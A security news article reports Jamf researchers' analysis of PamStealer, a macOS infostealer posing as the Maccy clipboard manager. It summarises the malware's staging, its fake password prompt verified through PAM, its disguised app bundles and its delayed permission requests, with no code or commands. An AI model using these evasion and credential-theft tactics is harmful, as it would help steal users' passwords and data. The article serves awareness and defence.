Cybersecurity researchers discovered a new macOS malware dubbed PamStealer that employs a covert method to steal user credentials. The malware disguises itself as a legitimate Mac application and uses built-in macOS features to capture and verify passwords before sending them to an attacker-controlled server.
Researchers at Jamf stated that PamStealer uses multiple techniques that make it harder to detect compared to many existing macOS information-stealing malware. It also relies on custom-built components rather than standard attack methods commonly seen in similar threats.
PamStealer spreads through a disk image that appears to be Maccy, a well-known clipboard manager for macOS. Users are told to press Command-R after opening the file, which triggers malicious activity instead of a normal installation.
The first stage is written in AppleScript. Hidden code in the script downloads the next stage using JavaScript for Automation (JXA) and native macOS APIs instead of typical system commands. Researchers reported that this reduces visible signs of malicious activity and makes detection more difficult for security tools.
The second stage is written in Rust, a programming language not commonly used in macOS infostealers. It shows a fake password prompt that looks similar to a real macOS system request. The malware asks users to enter their password, claiming that Maccy needs permission to make changes. Instead of sending the password for external verification, PamStealer checks it locally using macOS’s Pluggable Authentication Modules (PAM) system.
Researchers said this method avoids creating extra system processes that security tools usually track. If the password is wrong, the prompt keeps appearing until the correct one is entered. After verification, users see a fake message saying the application is damaged and cannot be installed. This is designed to reduce suspicion and make the attack appear like a normal installation failure.
PamStealer uses several methods to stay hidden after infecting a device. It hides inside fake app bundles that look similar to macOS tools such as Finder or Software Update. It also uses real system icons to make the fake apps appear genuine.
Researchers found that the malware delays permission requests, such as Full Disk Access, for up to 40 minutes after infection. This timing helps it separate its activity from the initial installation, making it harder to detect. The malware also encrypts its communication with remote servers. It even includes functions that can access Ethereum-related data stored on infected systems.
Security experts mention that PamStealer combines several techniques in a single attack. These include a Script Editor-based trick, a self-contained downloader using JXA, a Rust-based payload, and password checks using macOS’s built-in PAM system.
Researchers also confirmed that this case reflects a wider trend in macOS malware. Attackers are increasingly using built-in system features and quieter methods to avoid security detection. The findings highlight the importance of caution when installing apps, even if they appear legitimate.
Also Read: Apple Releases macOS Golden Gate Beta 2 with Next-Gen Apple Intelligence and Smarter Siri AI